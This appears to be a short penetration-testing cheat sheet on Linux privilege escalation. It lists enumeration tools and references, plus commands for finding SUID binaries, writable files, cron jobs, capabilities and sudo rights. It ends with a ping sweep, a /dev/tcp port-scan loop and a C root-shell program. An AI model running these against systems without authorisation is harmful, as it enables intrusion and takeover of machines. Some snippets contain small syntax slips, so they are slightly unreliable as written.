Linux Snippets

1 minute read

Small collection of Linux privilege escalation scripts, references and commands.

Scripts

LinEnum.sh
Private-i.sh
LinPeas.sh
pspy
LinuxPrivChecker.py
Linux-Exploit-Suggester.sh

References

GTFOBins
Linux - Privilege Escalation
Basic Linux Privilege Escalation

General

OS


cat /etc/issue
cat cat /etc/*-release

cat /proc/version
uname -a


Files


find / -readable 2>/dev/null           //find all readable files
find / -user <username>                //find all files of username
find / -group <groupname> 2>/dev/null  //find all files of groupname
find / -name <filename>                //find filename

find / -type f -name "*.conf"       //find all .conf files
find /etc -type f -name "*.conf"   //find all .conf files in /etc

find / -newermt <start-date> ! -newermt <end-date> 2>/dev/null   //find all modified files

find targetdir/ -name '*.<extension>' -exec cat {} \; > out.txt  // find all files with <extension> and cat into out.txt
  cat out.txt | grep <keyword>

find / -perm -o+w -type f 2>/dev/null | grep -v '/proc\|/dev'    // startup scripts

find / -writable -type d 2>/dev/null   // writable dirs


Cronjobs


crontab -l       //list current crontab
cat /etc/crontab //check system wide crontab

ls -la /etc/cron* 

crontab -e      //edit current crontab


Check capabilities


getcap -r /

+ep - Adding capability
-ep - Removing capability

There are 3 modes:
• e: EffectiveThis means the capability is "activated".
• p: PermittedThis means the capability can be used/is allowed.
• i: InheritedThe capability is kept by child/subprocesses  upon execve() for example.


Running processes/services


ps aux 
ps -ef
ps aux | grep root
ps -ef | grep root

top
cat /etc/services


Running daemons


ps -eo 'tty,pid,comm' | grep ^?  //all


Listening ports


netstat -an | grep 'LISTEN'
lsof -i -P -n | grep LISTEN
ss -tulw
grep -v "rem_address" /proc/net/tcp  | awk  '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'


Firewall rules


cat /etc/iptables/rules.v4
cat /etc/iptables/rules.v6


Sudo configuration


sudo -l
cat /etc/sudoers


Vulnerable binaries


find / -perm -u=s -type f 2>/dev/null //SUID
find / -perm -g=s -type f 2>/dev/null //GUID


Ping sweep


 for i in {1..254} ;do (ping -c 1 x.x.x.$i | grep "bytes from" &) ;done


Port scan


for p in {1..1024}; do(echo >/dev/tcp/<ip>/$p) >/dev/null 2>&1 && echo "$p open"; done


rootshell.c


#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}